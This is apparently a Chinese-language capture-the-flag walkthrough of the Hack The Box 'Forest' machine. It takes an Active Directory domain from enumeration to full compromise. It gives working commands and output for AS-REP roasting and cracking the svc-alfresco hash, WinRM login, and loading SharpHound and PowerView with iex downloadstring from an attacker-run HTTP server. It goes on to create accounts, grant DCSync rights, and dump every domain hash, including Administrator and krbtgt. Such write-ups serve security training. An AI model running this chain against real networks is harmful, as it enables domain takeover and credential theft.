CN=HealthMailbox6ded67848a234577a1756e072081d01f,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox83d6781be36b4bbf8893b03c2ee379ab,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxfd87238e536e49e08738480d300e3772,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxb01ac647a64648d2a5fa21df27058a24,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox7108a4e350f84b32a7a90d8e718f78cf,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox0659cc188f4c4f9f978f6c2142c4181e,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=Exchange Install Domain Servers,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=SystemMailbox{ce2583c9-4e38-48ab-b23d-88d6e3aa059f},CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=Program Data,DC=htb,DC=local
CN=Microsoft,CN=Program Data,DC=htb,DC=local
CN=NTDS Quotas,DC=htb,DC=local
CN=Managed Service Accounts,DC=htb,DC=local
CN=Keys,DC=htb,DC=local
OU=Service Accounts,DC=htb,DC=local
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
OU=Security Groups,DC=htb,DC=local
CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
CN=test,OU=Security Groups,DC=htb,DC=local
OU=Employees,DC=htb,DC=local
OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Exchange Administrators,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Sebastien Caron,OU=Exchange Administrators,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Developers,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Santi Rodriguez,OU=Developers,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Application Support,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=IT Management,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Lucinda Berger,OU=IT Management,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Helpdesk,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Andy Hislip,OU=Helpdesk,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Sysadmins,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Mark Brandt,OU=Sysadmins,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Sales,OU=Employees,DC=htb,DC=local
OU=Marketing,OU=Employees,DC=htb,DC=local
OU=Reception,OU=Employees,DC=htb,DC=local
CN=TPM Devices,DC=htb,DC=local
CN=Builtin,DC=htb,DC=local
CN=Account Operators,CN=Builtin,DC=htb,DC=local
CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=htb,DC=local
CN=Incoming Forest Trust Builders,CN=Builtin,DC=htb,DC=local
CN=Windows Authorization Access Group,CN=Builtin,DC=htb,DC=local
CN=Terminal Server License Servers,CN=Builtin,DC=htb,DC=local
CN=Administrators,CN=Builtin,DC=htb,DC=local
CN=Users,CN=Builtin,DC=htb,DC=local
CN=Guests,CN=Builtin,DC=htb,DC=local
CN=Print Operators,CN=Builtin,DC=htb,DC=local
CN=Backup Operators,CN=Builtin,DC=htb,DC=local
CN=Replicator,CN=Builtin,DC=htb,DC=local
CN=Remote Desktop Users,CN=Builtin,DC=htb,DC=local
CN=Network Configuration Operators,CN=Builtin,DC=htb,DC=local
CN=Performance Monitor Users,CN=Builtin,DC=htb,DC=local
CN=Performance Log Users,CN=Builtin,DC=htb,DC=local
CN=Distributed COM Users,CN=Builtin,DC=htb,DC=local
CN=IIS_IUSRS,CN=Builtin,DC=htb,DC=local
CN=Cryptographic Operators,CN=Builtin,DC=htb,DC=local
CN=Event Log Readers,CN=Builtin,DC=htb,DC=local
CN=Certificate Service DCOM Access,CN=Builtin,DC=htb,DC=local
CN=RDS Remote Access Servers,CN=Builtin,DC=htb,DC=local
CN=RDS Endpoint Servers,CN=Builtin,DC=htb,DC=local
CN=RDS Management Servers,CN=Builtin,DC=htb,DC=local
CN=Hyper-V Administrators,CN=Builtin,DC=htb,DC=local
CN=Access Control Assistance Operators,CN=Builtin,DC=htb,DC=local
CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
CN=System Managed Accounts Group,CN=Builtin,DC=htb,DC=local
CN=Storage Replica Administrators,CN=Builtin,DC=htb,DC=local
CN=Server Operators,CN=Builtin,DC=htb,DC=local
OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=UM Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Records Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Server Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=htb,DC=localService Accounts
CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Managed Availability Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[*] Bye!
重点:
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
htb.local域的服务账号叫svc-alfresco是可以利用AS-REP Roasting攻击
AS-REP Roasting攻击
AS-REP Roasting和kerberoasting攻击的区别
AS-REP Roasting:
AS-REP Roasting 可提取账户哈希来进行离线暴力破解,前提是需要账户开启不使用Kerberos预认证或将uf_dont_require_preauth设置为true。
kerberoasting:
kerberoasting 通常需要域上的凭据才能进行身份验证,在域中提取服务帐户凭据哈希来进行离线破解。
使用Impacket包中的GetNPUsers.py进行TGT Hash获取
下载:
https://github.com/fortra/impacket
安装:
pip install -r requirements.txt
工具位置:
impacket-0.10.0/examples/
用法:
python GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
返回TGT Hash内容
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
使用hashcat破解TGT
用法:
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
参数说明:
hash.txt是TGT Hash,rockyou是字典如果爆破不不出来可以添加一下密码,--force忽略异常,-m 18200 指定破解模式为Kerberos 5, etype 23, AS-REP
TGT Hash:$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
结果:
└─# hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1428/2921 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14342314
* Bytes.....: 139917341
* Keyspace..: 14342306
* Runtime...: 1 sec
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e022
74cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6
263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663
b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d5547960643847103
0499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c4
4b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56
524d4f415ae283ef0feb:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e...ef0feb
Time.Started.....: Sat Dec 24 07:24:55 2022, (0 secs)
Time.Estimated...: Sat Dec 24 07:24:55 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 24330 H/s (0.52ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1024/14342306 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14342306 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> abcd1234
Hardware.Mon.#1..: Util: 45%
Started: Sat Dec 24 07:24:26 2022
Stopped: Sat Dec 24 07:24:57 2022
获取明文:s3rvice
使用john破解:
john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
--fork=4 指定破解模式为Kerberos
hash.txt TGT Hash
rockyou 字典
john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1 1g 0:00:00:00 DONE (2022-12-24 07:33) 100.0g/s 1600p/s 1600c/s 1600C/s 123456..hello
Waiting for 3 children to terminate
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
3 1g 0:00:00:02 DONE (2022-12-24 07:33) 0.3597g/s 367263p/s 367263c/s 367263C/s s3tang1tar..s3rena
2 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356757p/s 356757c/s 356757C/s xCvBnM,..*7¡Vamos!
4 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356756p/s 356756c/s 356756C/s c125263.abygurl69
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
查看之前破解结果:john --show hash.txt(之前指定的破解文件)
john在破解成功后再次破解会显示破解成过,需要查看之前破解出来的密码用上面的命令
$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice
使用WinRM登陆
安装:
gem install evil-winrm
下载地址:https://github.com/Hackplayers/evil-winrm/releases/tag/v3.3
命令:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
-i 机器ip
-u 服务账号
-p 通过john或者hashcat爆破TGT hash成功后的明文密码
获取user flag:
type c:\Users\svc-alfresco\desktop\user.txt
使用bloodhound寻找特权路径
使用WinRM登录并加载bloodhound powershell收集器
1.使用python开启80端口以下载SharpHound.ps1
SharpHound.ps1目录下运行python3 -m http.server 80
2.WinRM加载Powershell脚本
iex(new-object net.webclient).downloadstring("http://10.10.14.26/SharpHound.ps1")
10.10.14.26根据你的ip addr填写
3.执行脚本
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
4.下载凭据文件
WinRM下运行download remote_path local_path
安装bloodhound:
pip install pycrypto //环境库
pip install bloodhound //采集器
apt install bloodhound //本体
sudo apt install default-jre //安装最新java非必须
这可以使用该命令获取凭据:
bloodhound-python -d htb.local -usvc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
启动bloodhound:
neo4j start
neo4j/neo4j 默认账号密码
kali工具包中启动bloodhound
分析:
起始位置:SVC-ALFRESCO@HTB.LOCAL
目标位置:DOMAIN ADMINS@HTB.LOCAL
内容:
1. SVC-ALFRESCO@HTB.LOCAL MembefOf SERVICE ACCOUNTS@HTB.LOCAL
2. SERVICE ACCOUNTS@HTB.LOCAL MembefOf PRIVILEGED IT ACCOUNTS@HTB.LOCAL
3. PRIVILEGED IT ACCOUNTS@HTB.LOCAL MembefOf ACCOUNT OPERATORS@HTB.LOCAL
4. ACCOUNT OPERATORS@HTB.LOCAL GenericAll EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL
5. EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL WriteDacl DOMAIN ADMINS@HTB.LOCAL
目前控制的服务账号是SVC-ALFRESCO@HTB.LOCAL位于SERVICE ACCOUNTS@HTB.LOCAL组中,SERVICE ACCOUNTS@HTB.LOCAL组位于PRIVILEGED IT ACCOUNTS@HTB.LOCAL组中,
ACCOUNT OPERATORS@HTB.LOCAL对EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL组有完全控制权并且PRIVILEGED IT ACCOUNTS@HTB.LOCAL属于ACCOUNT OPERATORS@HTB.LOCAL组中,
因此可以通过ACCOUNT OPERATORS@HTB.LOCAL权限滥用写入账号到EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL中并通过该组写入Dacl于DOMAIN ADMINS@HTB.LOCAL完成权限提升。
分析总结:
1.SVC-ALFRESCO@HTB.LOCAL属于ACCOUNT OPERATORS@HTB.LOCAL组
2.ACCOUNT OPERATORS@HTB.LOCAL组对EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL组有完全控制权
3.通过EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL组向DOMAIN ADMINS@HTB.LOCAL组写入Dacl完成权限提升
添加命令:
net group "EXCHANGE TRUSTED SUBSYSTEM" svc-alfresco /add /domain //添加
net group "EXCHANGE TRUSTED SUBSYSTEM" //查询添加
可以新增一个账号添加到EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL中
net user hack hack@123 /add /domain
net group "EXCHANGE TRUSTED SUBSYSTEM" hack /add /domain
滥用WriteDacl进行权限提升
下载:
滥用WriteDacl需要使用PowerSploit工具
https://github.com/PowerShellMafia/PowerSploit
需要使用的Powershell脚本叫PowerView.ps1位于Recon目录下
过程:
PowerSploit-3.0.0/Recon目录下运行python3 -m http.server 80
evil-winrm shell:
方式1:
iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')
$pass = convertto-securestring 'hack@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\hack', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hack -Rights DCSync
方式2:
iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')
net user john abc123! /add /domain
net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add //加入远程组可以使用WinRM进行登录
$pass = convertto-securestring 'abc123!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\john',$pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
如果遇到Add-DomainObjectAcl无法识别情况不要使用github下载的Latest使用Code下载的master
Dcsync:
使用impacket工具包下的secretsdump.py进行Dcsync操作
建议使用impacket_0_9_22版本impacket-0.10.0可以存在不兼容导致运行失败
impacket-impacket_0_9_22\examples\secretsdump.py
python3 secretsdump.py hack:hack@123@10.10.10.161
结果:
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
hack:9601:aad3b435b51404eeaad3b435b51404ee:3593d341679cb1cd42d5ee96d317987d:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:541d62e36754f1ad9932c73c83a2ea22:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
hack:aes256-cts-hmac-sha1-96:3e877d2ee838c042e5124b1304e158a77cf7ac14422977e5d769b5fb336a59c5
hack:aes128-cts-hmac-sha1-96:d81571d16a8bcc04086496dcb8c1ca76
hack:des-cbc-md5:706b0bec3b2986da
FOREST$:aes256-cts-hmac-sha1-96:03c48356fe7273823823843a0404b6a40f2970a44daf762a7632d9b101dbfaba
FOREST$:aes128-cts-hmac-sha1-96:0612d5cf3ef699f12e8bf4d2db18c9f2
FOREST$:des-cbc-md5:a4ceadfed0d526a7
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
获取System flag
Dcsync:htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
